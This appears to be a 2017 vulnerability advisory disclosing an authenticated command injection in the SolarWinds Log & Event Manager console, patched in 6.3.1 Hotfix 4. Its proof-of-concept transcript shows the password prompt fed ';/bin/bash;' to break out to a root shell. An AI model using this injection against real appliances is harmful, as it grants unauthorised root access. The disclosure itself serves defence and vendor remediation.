April 10, 2017
February 7, 2017
SolarWinds
SolarWinds Log & Event Manager (LEM) before 6.3.1 Hotfix 4
The Bishop Fox assessment team discovered an arbitrary command injection vulnerability within the SolarWinds’ Log & Event Manager (LEM) management console (CMC). The CMC is a restricted environment providing functionality for upgrading or maintaining LEM appliances. This vulnerability allows an authenticated user to bypass restrictions imposed by the CMC and execute arbitrary commands on the vulnerable system as the root user.
The vendor has been notified and has issued patches.
To demonstrate the impact of this vulnerability, the assessment team injected syntax to break out of the LEM application and execute a system shell:
cmc> appliance
cmc::acm# exportsyslog
Press <enter> to begin export syslog process.
Available Log Files:
1. ( 53 kB) Authentication log
…omitted for brevity…
Log groups selected: 1 ( 1 kB )
Select log files to include (q to quit, * for all, n for none, twice to toggle): q
Please enter the network share path (e.g. \\myserver\myshare): \\server\share
Is the path \\server\share correct? <Y/n>
Please enter the username, including any domain information (e.g. DOMAIN\user): mydomain\user
Is the user mydomain\user correct? <Y/n>
Please enter the password: ‘;/bin/bash;’
Please verify the password: ‘;/bin/bash;’
Creating logfile archive...done.
Usage: smbclient [-?EgBVNkPeC] [-?|--help] [--usage]
[-R|--name-resolve=NAME-RESOLVE-ORDER] [-M|--message=HOST]
…omitted for brevity…
[-C|--use-ccache] service <password>
--(0)-[10.1.60.211]-[6.3.1]-[root@swi-lem]--
/usr/local/contego # id
uid=0(root) gid=0(root) groups=0(root)
--(0)-[10.1.60.211]-[6.3.1]-[root@swi-lem]--
/usr/local/contego # uname -a
Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64 GNU/Linux
As shown in this above proof of concept, the research team fully compromised the affected system by exploiting this vulnerability.
Baker Hamilton, MD, MMSc of Bishop Fox
For Reference
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
LEM V6.3.1 HOT FIX 4 IS NOW AVAILABLE
The team at Bishop Fox would like to thank SolarWinds for their cooperation in quickly resolving this matter!
8240 S. Kyrene Rd.
Suite A113
Tempe, AZ
85284
United States